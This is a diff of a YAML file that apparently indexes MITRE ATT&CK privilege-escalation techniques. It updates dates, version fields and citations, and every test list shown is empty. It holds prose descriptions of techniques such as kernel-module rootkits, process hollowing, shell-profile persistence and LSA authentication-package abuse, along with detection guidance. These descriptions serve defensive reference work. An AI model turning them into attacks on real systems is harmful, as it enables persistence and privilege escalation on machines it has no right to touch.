       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests: []
   T1574.013:
@@ -20642,7 +20956,7 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -20668,12 +20982,10 @@ privilege-escalation:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -20751,9 +21063,8 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1574:
@@ -20820,7 +21131,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -20894,11 +21204,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -20915,7 +21224,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -20925,7 +21233,7 @@ privilege-escalation:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -20934,19 +21242,17 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -20994,11 +21300,12 @@ privilege-escalation:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -21066,23 +21373,22 @@ privilege-escalation:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests: []
   T1068:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-04-07T17:13:54.168Z'
       name: Exploitation for Privilege Escalation
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
@@ -21145,11 +21451,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -21202,8 +21507,8 @@ privilege-escalation:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -21251,78 +21556,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests: []
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -21370,6 +21608,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -21380,9 +21622,13 @@ privilege-escalation:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -21391,8 +21637,67 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests: []
   T1134.005:
@@ -21438,7 +21743,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -21463,13 +21768,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -21549,7 +21852,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.002:
     technique:
@@ -21585,7 +21887,7 @@ privilege-escalation:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -21608,12 +21910,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests: []
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -21691,12 +21992,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
